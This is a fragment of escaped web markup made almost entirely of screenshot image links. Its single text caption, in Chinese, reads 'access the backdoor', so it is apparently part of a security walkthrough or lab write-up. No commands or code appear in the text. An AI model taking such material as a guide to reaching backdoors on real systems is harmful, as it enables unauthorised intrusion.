<\/p>\n![\"1746500357126-72c0197a-95b3-4f94-9ca0-6bbf06b2094d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae042e1fdb.png\")
<\/p>\n![\"1746500390983-99933693-b760-4477-8bce-cd84c66c23cf.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0461efe4.png\")
<\/p>\n![\"1746500403474-bf7b788b-7d0a-4ffb-8fac-11d5cd073487.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae048e566c.png\")
<\/p>\n![\"1746500570962-585c32ab-20b5-4ae2-bc01-e2763d414eba.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae04b78d74.png\")
<\/p>\n![\"1746500583909-b522a029-3709-4952-94a0-948586747543.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae04e5bddc.png\")
<\/p>\n![\"1746500597905-800409b8-7616-4b96-a8d4-8ab82661afb2.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0521901f.png\")
<\/p>\n![\"1746500606109-60e2a2f8-ba9b-419c-b9ee-a04d7c9fc73b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae05596818.png\")
<\/p>\n![\"1746500616135-ad3101ac-3a9c-45a0-b043-e9df48300ed7.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae059694a5.png\")
<\/p>\n![\"1746500623496-bb3dfdb0-3be4-4d03-8e8e-3602ef18d0e1.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae05cd6f1f.png\")
<\/p>\n![\"1746500711397-b35536a5-8384-42ab-846c-8091b6eab5fb.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae05fc564f.png\")
<\/p>\n![\"1746500723863-57814b1a-821f-4504-8422-79ded31c80ff.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae06278c24.png\")
<\/p>\n![\"1746500731006-9bf66689-a8c6-4635-9e73-708c8b7ef870.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0652024b.png\")
\u8bbf\u95ee\u540e\u95e8<\/p>\n![\"1746500738710-dd2135e0-fcc2-4d8b-baa1-abbe613c43a0.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0681d029.png\")
<\/p>\n![\"1746501002177-bf6c2c97-b9e8-4c7c-9d0f-f8d2e5a19c91.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae06ad56fe.png\")
<\/p>\n![\"1746501020454-05dbf60b-e389-4e16-a9d2-de5e4d0c37f9.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae06de4618.png\")
<\/p>\n